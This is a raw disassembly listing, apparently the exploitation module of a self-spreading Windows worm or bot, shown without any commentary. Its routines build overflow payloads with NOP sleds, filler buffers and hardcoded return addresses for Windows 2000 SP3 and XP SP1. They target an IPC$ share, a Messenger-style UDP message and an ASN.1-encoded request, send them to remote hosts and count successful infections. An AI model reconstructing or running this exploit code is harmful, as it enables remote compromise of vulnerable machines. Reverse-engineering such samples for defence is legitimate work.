; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DDD9 proc near ; CODE XREF: .text:0040E332�p
; .text:0040E354�p ...
var_89B8 = byte ptr -89B8h
var_8950 = byte ptr -8950h
var_68E0 = byte ptr -68E0h
var_6870 = byte ptr -6870h
var_5DAC = byte ptr -5DACh
var_4808 = byte ptr -4808h
var_4807 = byte ptr -4807h
var_3774 = byte ptr -3774h
var_2CB0 = byte ptr -2CB0h
var_2CAF = byte ptr -2CAFh
Dst = byte ptr -2CACh
var_24C8 = byte ptr -24C8h
var_24B8 = byte ptr -24B8h
var_2194 = byte ptr -2194h
var_2190 = byte ptr -2190h
var_2184 = byte ptr -2184h
var_1EFC = byte ptr -1EFCh
var_1E80 = byte ptr -1E80h
var_16B0 = byte ptr -16B0h
var_1205 = byte ptr -1205h
var_F18 = byte ptr -0F18h
var_E78 = byte ptr -0E78h
var_76C = dword ptr -76Ch
var_75C = byte ptr -75Ch
var_748 = byte ptr -748h
Src = byte ptr -108h
var_107 = byte ptr -107h
var_B8 = byte ptr -0B8h
var_B5 = byte ptr -0B5h
var_8B = byte ptr -8Bh
var_89 = byte ptr -89h
var_88 = byte ptr -88h
Str = byte ptr -40h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_BC = dword ptr 0C4h
arg_C0 = dword ptr 0C8h
push ebp
mov ebp, esp
mov eax, 89B8h
call __alloca_probe
mov eax, ds:dword_43310C
push ebx
mov [ebp+var_10], eax
mov eax, ds:dword_433110
push esi
mov [ebp+var_C], eax
push edi
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+Str]
push offset aSIpc ; "\\\\%s\\ipc$"
push eax ; Dest
call _sprintf
add esp, 0Ch
xor ebx, ebx
xor eax, eax
loc_40DE12: ; CODE XREF: sub_40DDD9+4F�j
mov cl, [ebp+eax+Str]
mov [ebp+eax*2+Src], cl
mov [ebp+eax*2+var_107], bl
inc eax
cmp eax, 28h
jl short loc_40DE12
push 60h ; Size
lea eax, [ebp+var_B8]
push offset dword_43EFF0 ; Src
push eax ; Dst
call _memcpy
lea eax, [ebp+Str]
push eax ; Str
call _strlen
shl eax, 1
push eax ; Size
lea eax, [ebp+Src]
push eax ; Src
lea eax, [ebp+var_88]
push eax ; Dst
call _memcpy
add esp, 1Ch
push 9 ; Size
lea eax, [ebp+Str]
push (offset aC_4+3) ; Src
push eax ; Str
call _strlen
pop ecx
lea eax, [ebp+eax*2+var_89]
push eax ; Dst
call _memcpy
lea eax, [ebp+Str]
push eax ; Str
call _strlen
add al, 1Ah
shl al, 1
mov [ebp+var_1], al
push 1 ; Size
lea eax, [ebp+var_1]
push eax ; Src
lea eax, [ebp+var_B5]
push eax ; Dst
call _memcpy
lea eax, [ebp+Str]
push eax ; Str
call _strlen
shl al, 1
add al, 9
mov [ebp+var_2], al
push 1 ; Size
lea eax, [ebp+var_2]
push eax ; Src
lea eax, [ebp+var_8B]
push eax ; Dst
call _memcpy
xor eax, eax
mov ax, word ptr dword_4D525C
add esp, 2Ch
push eax
call dword_444260 ; htons
push [ebp+arg_0]
xor eax, 9999h
mov [ebp+var_18], eax
call sub_4023C9
pop ecx
push eax
call dword_44417C ; inet_addr
xor eax, 99999999h
mov [ebp+var_8], eax
push 2 ; Size
lea eax, [ebp+var_18]
push eax ; Src
push offset word_43EB6E ; Dst
call _memcpy
push 4 ; Size
lea eax, [ebp+var_8]
push eax ; Src
push offset byte_43EB67 ; Dst
call _memcpy
add esp, 18h
cmp [ebp+arg_C0], ebx
jz loc_40E001
mov edi, 0DACh
push edi ; Size
lea eax, [ebp+Dst]
push 90h ; Val
push eax ; Dst
call _memset
mov eax, [ebp+arg_C0]
imul eax, 3Ch
lea eax, dword_43F438[eax]
push 4 ; Size
push eax ; Src
mov [ebp+var_14], eax
lea eax, [ebp+var_24C8]
push eax ; Dst
call _memcpy
mov esi, offset aI_2 ; "ë"
push esi ; Str
call _strlen
push eax ; Size
lea eax, [ebp+var_24B8]
push esi ; Src
push eax ; Dst
call _memcpy
push 4 ; Size
lea eax, [ebp+var_2194]
push offset dword_4330F8 ; Src
push eax ; Dst
call _memcpy
push 4 ; Size
push [ebp+var_14] ; Src
lea eax, [ebp+var_2190]
push eax ; Dst
call _memcpy
add esp, 40h
push esi ; Str
call _strlen
push eax ; Size
lea eax, [ebp+var_2184]
push esi ; Src
push eax ; Dst
call _memcpy
add esp, 10h
xor eax, eax
loc_40DFB3: ; CODE XREF: sub_40DDD9+1F2�j
mov cl, [ebp+eax+Dst]
mov [ebp+eax*2+var_4808], cl
mov [ebp+eax*2+var_4807], bl
inc eax
cmp eax, edi
jl short loc_40DFB3
mov esi, 1C52h
push esi ; Size
lea eax, [ebp+var_89B8]
push 31h ; Val
push eax ; Dst
mov [ebp+var_2CB0], bl
mov [ebp+var_2CAF], bl
call _memset
push esi ; Size
lea eax, [ebp+var_68E0]
push 31h ; Val
push eax ; Dst
call _memset
add esp, 18h
jmp short loc_40E058
; ---------------------------------------------------------------------------
loc_40E001: ; CODE XREF: sub_40DDD9+143�j
push 7D0h ; Size
lea eax, [ebp+var_F18]
push 90h ; Val
push eax ; Dst
call _memset
mov esi, offset aI_2 ; "ë"
push esi ; Str
call _strlen
push eax ; Size
lea eax, [ebp+var_E78]
push esi ; Src
push eax ; Dst
call _memcpy
lea eax, [ebp+var_10]
push eax ; Str
call _strlen
push eax ; Size
lea eax, [ebp+var_10]
push eax ; Src
lea eax, [ebp+var_75C]
push eax ; Dst
call _memcpy
mov eax, dword_43F438
add esp, 2Ch
mov [ebp+var_76C], eax
loc_40E058: ; CODE XREF: sub_40DDD9+226�j
push 0E29h ; Size
lea eax, [ebp+var_1EFC]
push 31h ; Val
push eax ; Dst
call _memset
movsx eax, [ebp+var_1]
mov edi, [ebp+arg_BC]
add esp, 0Ch
push ebx
add eax, 4
push eax
lea eax, [ebp+var_B8]
push eax
push edi
call dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jz loc_40E215
push ebx
mov esi, 640h
push esi
lea eax, [ebp+var_748]
push eax
push edi
call dword_444064 ; recv
push ebx
push 68h
push offset dword_43F058
push edi
call dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jz loc_40E215
push ebx
push esi
lea eax, [ebp+var_748]
push eax
push edi
call dword_444064 ; recv
push ebx
push 0A0h
push offset dword_43F0C8
push edi
call dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jz loc_40E215
push ebx
push esi
lea eax, [ebp+var_748]
push eax
push edi
call dword_444064 ; recv
cmp [ebp+arg_C0], ebx
jz loc_40E1B2
push 68h ; Size
lea eax, [ebp+var_89B8]
push offset dword_43F288 ; Src
push eax ; Dst
call _memcpy
push 1B5Ah ; Size
lea eax, [ebp+var_4808]
push eax ; Src
lea eax, [ebp+var_8950]
push eax ; Dst
call _memcpy
push 70h ; Size
lea eax, [ebp+var_68E0]
push offset dword_43F2F8 ; Src
push eax ; Dst
call _memcpy
push 0A5Eh ; Size
lea eax, [ebp+var_3774]
push eax ; Src
lea eax, [ebp+var_6870]
push eax ; Dst
call _memcpy
push 84h ; Size
lea eax, [ebp+var_5DAC]
push offset dword_43F370 ; Src
push eax ; Dst
call _memcpy
add esp, 3Ch
push ebx
push 10FCh
lea eax, [ebp+var_89B8]
push eax
push edi
call dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jz loc_40E215
push ebx
push esi
lea eax, [ebp+var_748]
push eax
push edi
call dword_444064 ; recv
push ebx
push 0FDCh
lea eax, [ebp+var_68E0]
jmp short loc_40E208
; ---------------------------------------------------------------------------
loc_40E1B2: ; CODE XREF: sub_40DDD9+329�j
push 7Ch ; Size
lea eax, [ebp+var_1EFC]
push offset dword_43F170 ; Src
push eax ; Dst
call _memcpy
push 7D0h ; Size
lea eax, [ebp+var_F18]
push eax ; Src
lea eax, [ebp+var_1E80]
push eax ; Dst
call _memcpy
push 90h ; Size
lea eax, [ebp+var_16B0]
push offset off_43F1F0 ; Src
push eax ; Dst
call _memcpy
add esp, 24h
push ebx
mov [ebp+var_1205], bl
push 0CF8h
lea eax, [ebp+var_1EFC]
loc_40E208: ; CODE XREF: sub_40DDD9+3D7�j
push eax
push edi
call dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_40E219
loc_40E215: ; CODE XREF: sub_40DDD9+2B5�j
; sub_40DDD9+2E2�j ...
xor al, al
jmp short loc_40E21B
; ---------------------------------------------------------------------------
loc_40E219: ; CODE XREF: sub_40DDD9+43A�j
mov al, 1
loc_40E21B: ; CODE XREF: sub_40DDD9+43E�j
pop edi
pop esi
pop ebx
leave
retn
sub_40DDD9 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 654h
push ebx
push esi
push edi
xor edi, edi
push 10h
lea eax, [ebp-14h]
push edi
push eax
mov [ebp-4], edi
call _memset
add esp, 0Ch
lea eax, [ebp+0Ch]
push eax
mov word ptr [ebp-14h], 2
call dword_44417C ; inet_addr
push dword ptr [ebp+0A8h]
mov [ebp-10h], eax
call dword_444260 ; htons
push 6
push 1
push 2
mov [ebp-12h], ax
call dword_444100 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_40E319
push 10h
lea eax, [ebp-14h]
push eax
push ebx
call dword_4440AC ; connect
cmp eax, 0FFFFFFFFh
jz loc_40E319
push edi
push 89h
push offset dword_43EDD0
push ebx
call dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40E319
push edi
mov esi, 640h
push esi
lea eax, [ebp-654h]
push eax
push ebx
call dword_444064 ; recv
push edi
push 0A8h
push offset dword_43EE60
push ebx
call dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40E319
push edi
push esi
lea eax, [ebp-654h]
push eax
push ebx
call dword_444064 ; recv
push edi
push 0DEh
push offset dword_43EF10
push ebx
call dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jz short loc_40E319
push edi
push esi
lea eax, [ebp-654h]
push eax
push ebx
call dword_444064 ; recv
movsx eax, byte ptr [ebp-610h]
sub eax, 30h
jz short loc_40E341
dec eax
jz short loc_40E320
loc_40E319: ; CODE XREF: .text:0040E274�j
; .text:0040E28A�j ...
xor eax, eax
jmp loc_40E3AD
; ---------------------------------------------------------------------------
loc_40E320: ; CODE XREF: .text:0040E317�j
push edi
push ebx
sub esp, 0BCh
push 2Fh
pop ecx
lea esi, [ebp+8]
mov edi, esp
rep movsd
call sub_40DDD9
add esp, 0C4h
push 0
jmp short loc_40E365
; ---------------------------------------------------------------------------
loc_40E341: ; CODE XREF: .text:0040E314�j
push 2
push ebx
sub esp, 0BCh
push 2Fh
pop ecx
lea esi, [ebp+8]
mov edi, esp
rep movsd
call sub_40DDD9
add esp, 0C4h
test al, al
jnz short loc_40E385
push 1
loc_40E365: ; CODE XREF: .text:0040E33F�j
push ebx
sub esp, 0BCh
push 2Fh
pop ecx
lea esi, [ebp+8]
mov edi, esp
rep movsd
call sub_40DDD9
add esp, 0C4h
test al, al
jz short loc_40E38C
loc_40E385: ; CODE XREF: .text:0040E361�j
mov dword ptr [ebp-4], 1
loc_40E38C: ; CODE XREF: .text:0040E383�j
push ebx
call dword_444218 ; closesocket
cmp dword ptr [ebp-4], 0
jz short loc_40E3AA
mov eax, [ebp+0B0h]
shl eax, 6
lea eax, dword_43D880[eax]
inc dword ptr [eax]
loc_40E3AA: ; CODE XREF: .text:0040E397�j
xor eax, eax
inc eax
loc_40E3AD: ; CODE XREF: .text:0040E31B�j
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40E3B2(void *Dst,size_t Size,int,int)
sub_40E3B2 proc near ; CODE XREF: .text:0040E670�p
var_13DC = byte ptr -13DCh
var_13CC = byte ptr -13CCh
var_11E8 = byte ptr -11E8h
var_AE4 = byte ptr -0AE4h
var_68E = byte ptr -68Eh
var_683 = dword ptr -683h
var_67F = dword ptr -67Fh
var_67B = byte ptr -67Bh
var_551 = byte ptr -551h
var_54 = byte ptr -54h
var_34 = byte ptr -34h
Source = byte ptr -24h
var_18 = byte ptr -18h
Src = dword ptr -10h
var_8 = dword ptr -8
Dst = dword ptr 8
Size = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, 13DCh
call __alloca_probe
push ebx
push esi
push edi
mov esi, offset dword_433180
lea edi, [ebp+Src]
movsd
movsd
movsd
movsb
mov esi, offset aNetmaniac ; "NETMANIAC"
lea edi, [ebp+Source]
movsd
movsd
movsw
mov esi, offset aAdik ; "ADIK"
lea edi, [ebp+var_18]
movsd
movsb
push 7
pop ecx
mov esi, offset dword_43314C
lea edi, [ebp+var_54]
rep movsd
movsw
movsb
mov esi, offset dword_43313C
lea edi, [ebp+var_34]
movsd
movsd
push [ebp+Size] ; Size
movsd
movsb
mov esi, offset aMessage ; "*** MESSAGE ***"
lea edi, [ebp+var_13DC]
movsd
movsd
movsd
movsd
mov esi, [ebp+Dst]
xor eax, eax
push eax ; Val
mov ecx, 4DEh
lea edi, [ebp+var_13CC]
push esi ; Dst
rep stosd
call _memset
push 50h ; Size
push offset dword_43F6D8 ; Src
push esi ; Dst
call _memcpy
lea eax, [ebp+Source]
push eax ; Str
call _strlen
mov edi, eax
push 0Ch ; Size
lea eax, [ebp+Src]
push eax ; Src
lea eax, [esi+50h]
inc edi
push eax ; Dst
mov [ebp+Src], edi
mov [ebp+var_8], edi
call _memcpy
lea eax, [ebp+Source]
push eax ; Source
lea eax, [esi+5Ch]
push eax ; Dest
call _strcpy
dec edi
lea eax, [ebp+var_18]
and edi, 0FFFFFFFCh
push eax ; Str
add edi, 60h
call _strlen
mov ebx, eax
inc ebx
mov [ebp+Src], ebx
mov [ebp+var_8], ebx
push 0Ch ; Size
lea eax, [ebp+Src]
push eax ; Src
lea eax, [edi+esi]
push eax ; Dst
call _memcpy
add esp, 40h
lea eax, [ebp+var_18]
push eax ; Source
add edi, 0Ch
lea eax, [edi+esi]
push eax ; Dest
call _strcpy
push 8F8h ; Size
dec ebx
lea eax, [ebp+var_13DC]
push 90h ; Val
and ebx, 0FFFFFFFCh
push eax ; Dst
lea edi, [edi+ebx+4]
call _memset
push 1E4h ; Size
lea eax, [ebp+var_11E8]
push offset dword_43F4F0 ; Src
push eax ; Dst
call _memcpy
push 708h ; Size
lea eax, [ebp+var_AE4]
push 14h ; Val
push eax ; Dst
call _memset
push 0Dh ; Size
lea eax, [ebp+var_34]
push eax ; Src
lea eax, [ebp+var_68E]
push eax ; Dst
call _memcpy
mov eax, [ebp+arg_8]
mov [ebp+var_683], eax
mov eax, [ebp+arg_C]
mov [ebp+var_67F], eax
push 1Eh ; Size
lea eax, [ebp+var_54]
push eax ; Src
lea eax, [ebp+var_67B]
push eax ; Dst
call _memcpy
add esp, 44h
mov eax, 0E8Ch
sub eax, edi
push eax
push offset aMsgBodySizeD ; "[*] Msg body size: %d\n"
push offset stru_443520 ; FILE *
call _fprintf
lea eax, [ebp+var_551]
sub eax, edi
mov byte ptr [eax], 0
lea eax, [ebp+var_13DC]
push eax ; Str
call _strlen
mov ebx, eax
push 0Ch ; Size
lea eax, [ebp+Src]
push eax ; Src
lea eax, [edi+esi]
inc ebx
push eax ; Dst
mov [ebp+Src], ebx
mov [ebp+var_8], ebx
call _memcpy
lea eax, [ebp+var_13DC]
push eax ; Source
add edi, 0Ch
lea eax, [edi+esi]
push eax ; Dest
call _strcpy
push 0 ; Time
add edi, ebx
call _time
mov [esi+28h], eax
add esp, 28h
lea eax, [edi-50h]
mov [esi+4Ah], eax
mov eax, edi
pop edi
pop esi
pop ebx
leave
retn
sub_40E3B2 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, 2064h
call __alloca_probe
push ebx
push esi
push edi
push 5
pop ecx
mov esi, offset aWindows2000Sp3 ; "Windows 2000 SP 3 (en)"
lea edi, [ebp-64h]
rep movsd
movsw
movsb
xor eax, eax
lea edi, [ebp-4Dh]
stosd
stosw
stosb
push 5
mov dword ptr [ebp-44h], 77EE044Ch
mov dword ptr [ebp-40h], 768D693Eh
pop ecx
mov esi, offset aWindowsXpSp1En ; "Windows XP SP 1 (en)"
lea edi, [ebp-3Ch]
rep movsd
movsb
xor eax, eax
lea edi, [ebp-27h]
stosd
stosd
stosb
lea eax, [ebp+0Ch]
push 1
push eax
mov dword ptr [ebp-1Ch], 77ED73B4h
mov dword ptr [ebp-18h], 7804BF52h
call sub_41AA0A
cmp eax, 1
pop ecx
pop ecx
jz loc_40E6F3
test eax, eax
jz loc_40E6F3
push 2
pop edi
cmp eax, edi
jnz short loc_40E61A
xor esi, esi
jmp short loc_40E61D
; ---------------------------------------------------------------------------
loc_40E61A: ; CODE XREF: .text:0040E614�j
mov esi, [ebp-14h]
loc_40E61D: ; CODE XREF: .text:0040E618�j
cmp eax, 3
jnz short loc_40E625
xor esi, esi
inc esi
loc_40E625: ; CODE XREF: .text:0040E620�j
push 10h
lea eax, [ebp-10h]
push 0
push eax
call _memset
add esp, 0Ch
lea eax, [ebp+0Ch]
push eax
mov [ebp-10h], di
call dword_44417C ; inet_addr
push dword ptr [ebp+0A8h]
mov [ebp-0Ch], eax
call dword_444260 ; htons
mov [ebp-0Eh], ax
lea eax, [esi+esi*4]
shl eax, 3
push dword ptr [ebp+eax-44h]
push dword ptr [ebp+eax-40h]
lea eax, [ebp-2064h]
push 2000h
push eax
call sub_40E3B2
add esp, 10h
push 11h
push edi
push edi
mov ebx, eax
call dword_444100 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_40E6F3
push 10h
lea eax, [ebp-10h]
push eax
push 0
push ebx
lea eax, [ebp-2064h]
push eax
push esi
call dword_4440CC ; sendto
cmp eax, 0FFFFFFFFh
jz short loc_40E6F3
push esi
call dword_444218 ; closesocket
push 1F4h
call ds:dword_42B014 ; Sleep
push 23E7h
sub esp, 0BCh
push 2Fh
pop ecx
lea esi, [ebp+8]
mov edi, esp
rep movsd
call sub_41B128
add esp, 0C0h
cmp al, 1
jnz short loc_40E6F3
mov eax, [ebp+0B0h]
shl eax, 6
lea eax, dword_43D880[eax]
inc dword ptr [eax]
xor eax, eax
inc eax
jmp short loc_40E6F5
; ---------------------------------------------------------------------------
loc_40E6F3: ; CODE XREF: .text:0040E601�j
; .text:0040E609�j ...
xor eax, eax
loc_40E6F5: ; CODE XREF: .text:0040E6F1�j
pop edi
pop esi
pop ebx
leave
retn
; [00000017 BYTES: COLLAPSED FUNCTION std::char_traits<char>::assign(char *,uint,char). PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_40E711(void *Src,size_t Size)
sub_40E711 proc near ; CODE XREF: sub_40E971+116�p
Src = dword ptr 4
Size = dword ptr 8
push ebx
mov ebx, [esp+4+Size]
push esi
push edi
push ebx ; Size
mov esi, ecx
call _malloc
mov edi, eax
test edi, edi
pop ecx
jz short loc_40E743
push ebx ; Size
push 0 ; Val
push edi ; Dst
call _memset
push ebx ; Size
push [esp+1Ch+Src] ; Src
push edi ; Dst
call _memcpy
add esp, 18h
mov [esi+4], ebx
mov [esi], edi
loc_40E743: ; CODE XREF: sub_40E711+14�j
pop edi
mov eax, esi
pop esi
pop ebx
retn 8
sub_40E711 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_40E74B(void *Src,size_t Size,int,int)
sub_40E74B proc near ; CODE XREF: sub_40E841+19�p
; sub_40E8B5+16�p ...
Src = dword ptr 8
Size = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, [ebp+Size]
push ebx
push esi
mov ebx, ecx
mov ecx, [ebp+arg_C]
push edi
lea edi, [eax+ecx]
push edi ; Size
call _malloc
mov esi, eax
test esi, esi
pop ecx
jz short loc_40E797
push edi ; Size
push 0 ; Val
push esi ; Dst
call _memset
push [ebp+Size] ; Size
push [ebp+Src] ; Src
push esi ; Dst
call _memcpy
push [ebp+arg_C] ; Size
mov eax, [ebp+Size]
push [ebp+arg_8] ; Src
add eax, esi
push eax ; Dst
call _memcpy
add esp, 24h
mov [ebx+4], edi
mov [ebx], esi
loc_40E797: ; CODE XREF: sub_40E74B+1C�j
pop edi
pop esi
mov eax, ebx
pop ebx
pop ebp
retn 10h
sub_40E74B endp
; =============== S U B R O U T I N E =======================================
sub_40E7A0 proc near ; CODE XREF: sub_40E841+5B�p
; sub_40E841+68�p ...
push esi
mov esi, ecx
mov eax, [esi]
test eax, eax
jz short loc_40E7B0
push eax ; Memory
call _free
pop ecx
loc_40E7B0: ; CODE XREF: sub_40E7A0+7�j
and dword ptr [esi+4], 0
and dword ptr [esi], 0
pop esi
retn
sub_40E7A0 endp
; =============== S U B R O U T I N E =======================================
sub_40E7B9 proc near ; CODE XREF: sub_40E841+21�p
; sub_40E916+8�p ...
push esi
mov esi, ecx
mov eax, [esi+4]
cmp eax, 0FFFFh
jl short loc_40E7CA
xor al, al
pop esi
retn
; ---------------------------------------------------------------------------
loc_40E7CA: ; CODE XREF: sub_40E7B9+B�j
push ebx
xor ebx, ebx
cmp eax, 7Fh
setnl bl
push edi
lea ebx, [ebx+ebx+1]
add eax, ebx
push eax ; Size
call _malloc
mov edi, eax
test edi, edi
pop ecx
jnz short loc_40E7EB
xor al, al
jmp short loc_40E83D
; ---------------------------------------------------------------------------
loc_40E7EB: ; CODE XREF: sub_40E7B9+2C�j
mov eax, [esi+4]
add eax, ebx
push eax ; Size
push 0 ; Val
push edi ; Dst
call _memset
add esp, 0Ch
cmp ebx, 1
jnz short loc_40E80B
mov al, [esi+4]
mov [edi], al
lea eax, [edi+1]
jmp short loc_40E820
; ---------------------------------------------------------------------------
loc_40E80B: ; CODE XREF: sub_40E7B9+46�j
mov byte ptr [edi], 82h
mov eax, [esi+4]
sar eax, 8
mov [edi+1], al
mov al, [esi+4]
mov [edi+2], al
lea eax, [edi+3]
loc_40E820: ; CODE XREF: sub_40E7B9+50�j
push dword ptr [esi+4] ; Size
push dword ptr [esi] ; Src
push eax ; Dst
call _memcpy
add esp, 0Ch
push dword ptr [esi] ; Memory
call _free
add [esi+4], ebx
pop ecx
mov [esi], edi
mov al, 1
loc_40E83D: ; CODE XREF: sub_40E7B9+30�j
pop edi
pop ebx
pop esi
retn
sub_40E7B9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E841 proc near ; CODE XREF: sub_40E971+7F�p
; sub_40E971+DB�p ...
Src = dword ptr -8
Size = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
mov esi, ecx
push dword ptr [esi+4] ; int
lea ecx, [ebp+Src]
push dword ptr [esi] ; int
push 1 ; Size
push offset byte_42C988 ; Src
call sub_40E74B
lea ecx, [ebp+Src]
call sub_40E7B9
mov ebx, [ebp+Size]
inc ebx
push ebx ; Size
call _malloc
mov edi, eax
test edi, edi
pop ecx
jnz short loc_40E87C
xor al, al
jmp short loc_40E8B0
; ---------------------------------------------------------------------------
loc_40E87C: ; CODE XREF: sub_40E841+35�j
push ebx ; Size
push 0 ; Val
push edi ; Dst
call _memset
push [ebp+Size] ; Size
lea eax, [edi+1]
push [ebp+Src] ; Src
mov byte ptr [edi], 3
push eax ; Dst
call _memcpy
add esp, 18h
mov ecx, esi
call sub_40E7A0
lea ecx, [ebp+Src]
mov [esi+4], ebx
mov [esi], edi
call sub_40E7A0
mov al, 1
loc_40E8B0: ; CODE XREF: sub_40E841+39�j
pop edi
pop esi
pop ebx
leave
retn
sub_40E841 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E8B5 proc near ; CODE XREF: std::basic_string<char,std::char_traits<char>,std::allocator<char>>::assign(char const *)+14�p
; sub_40E906+8�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push esi
push [ebp+arg_4] ; int
mov esi, ecx
push [ebp+arg_0] ; int
lea ecx, [ebp+var_8]
push dword ptr [esi+4] ; Size
push dword ptr [esi] ; Src
call sub_40E74B
mov ecx, esi
call sub_40E7A0
mov eax, [ebp+var_8]
mov [esi], eax
mov eax, [ebp+var_4]
mov [esi+4], eax
mov al, 1
pop esi
leave
retn 8
sub_40E8B5 endp
; [0000001D BYTES: COLLAPSED FUNCTION std::basic_string<char,std::char_traits<char>,std::allocator<char>>::assign(char const *). PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_40E906 proc near ; CODE XREF: sub_40E952+B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_40E8B5
retn 8
sub_40E906 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E916 proc near ; CODE XREF: sub_40E952+16�p
; sub_40E971+87�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push esi
mov esi, ecx
call sub_40E7B9
test al, al
jz short loc_40E94F
push dword ptr [esi+4] ; int
lea ecx, [ebp+var_8]
push dword ptr [esi] ; int
push 1 ; Size
push offset asc_42FCEC ; "#"
call sub_40E74B
mov ecx, esi
call sub_40E7A0
mov eax, [ebp+var_8]
mov [esi], eax
mov eax, [ebp+var_4]
mov [esi+4], eax
mov al, 1
loc_40E94F: ; CODE XREF: sub_40E916+F�j
pop esi
leave
retn
sub_40E916 endp
; =============== S U B R O U T I N E =======================================
sub_40E952 proc near ; CODE XREF: sub_40E971+12C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
push [esp+4+arg_4]
mov esi, ecx
push [esp+8+arg_0]
call sub_40E906
test al, al
jz short loc_40E96D
mov ecx, esi
call sub_40E916
loc_40E96D: ; CODE XREF: sub_40E952+12�j
pop esi
retn 8
sub_40E952 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E971 proc near ; CODE XREF: .text:0040F759�p
Dst = byte ptr -848h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 848h
push ebx
push esi
xor ecx, ecx
xor edx, edx
mov ebx, 408h
xor esi, esi
cmp [ebp+arg_8], ebx
mov [ebp+var_3C], ecx
mov [ebp+var_40], edx
jg loc_40ECC1
mov eax, [ebp+arg_10]
add eax, 8
cmp eax, ebx
ja loc_40ECC1
push edi
push 4
push offset dword_43F744
lea ecx, [ebp+var_28]
mov [ebp+var_24], esi
mov [ebp+var_28], esi
mov [ebp+var_4], esi
mov [ebp+var_8], esi
mov [ebp+var_34], esi
mov [ebp+var_38], esi
mov [ebp+var_C], esi
mov [ebp+var_10], esi
mov [ebp+var_2C], esi
mov [ebp+var_30], esi
mov [ebp+var_1C], esi
mov [ebp+var_20], esi
mov [ebp+var_14], esi
mov [ebp+var_18], esi
call sub_40E8B5
push 3
push offset dword_43F740
lea ecx, [ebp+var_28]
call sub_40E8B5
lea ecx, [ebp+var_28]
call sub_40E841
lea ecx, [ebp+var_28]
call sub_40E916
mov edi, 800h
push edi ; Size
lea eax, [ebp+Dst]
push 42h ; Val
push eax ; Dst
call _memset
add esp, 0Ch
push 8
push offset aRbrbrbrb ; "BBBB"
lea ecx, [ebp+var_8]
call sub_40E8B5
push [ebp+arg_10]
lea ecx, [ebp+var_8]
push [ebp+arg_C]
call sub_40E8B5
mov eax, 409h
sub eax, [ebp+var_4]
lea ecx, [ebp+var_8]
push eax
lea eax, [ebp+Dst]
push eax
call sub_40E8B5
lea ecx, [ebp+var_8]
call sub_40E841
push offset dword_4331E4 ; Str
lea ecx, [ebp+var_38]
call ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBD@Z ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::assign(char const *)
lea ecx, [ebp+var_38]
call sub_40E841
push edi ; Size
lea eax, [ebp+Dst]
push 44h ; Val
push eax ; Dst
call _memset
add esp, 0Ch
push 410h ; Size
lea eax, [ebp+Dst]
push eax ; Src
lea ecx, [ebp+var_48]
call sub_40E711
lea ecx, [ebp+var_48]
call sub_40E841
push [ebp+var_44]
lea ecx, [ebp+var_38]
push [ebp+var_48]
call sub_40E952
lea ecx, [ebp+var_48]
call sub_40E7A0
push edi ; Size
lea eax, [ebp+Dst]
push 43h ; Val
push eax ; Dst
call _memset
add esp, 0Ch
push offset aCccc ; "CCCC"
lea ecx, [ebp+var_10]
call ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBD@Z ; std::basic_string<char,std::char_traits<char>,std::allocator<char>>::assign(char const *)
push 4
push offset dword_43F72C
lea ecx, [ebp+var_10]
call sub_40E8B5
push [ebp+arg_8]
lea ecx, [ebp+var_10]
push [ebp+arg_4]
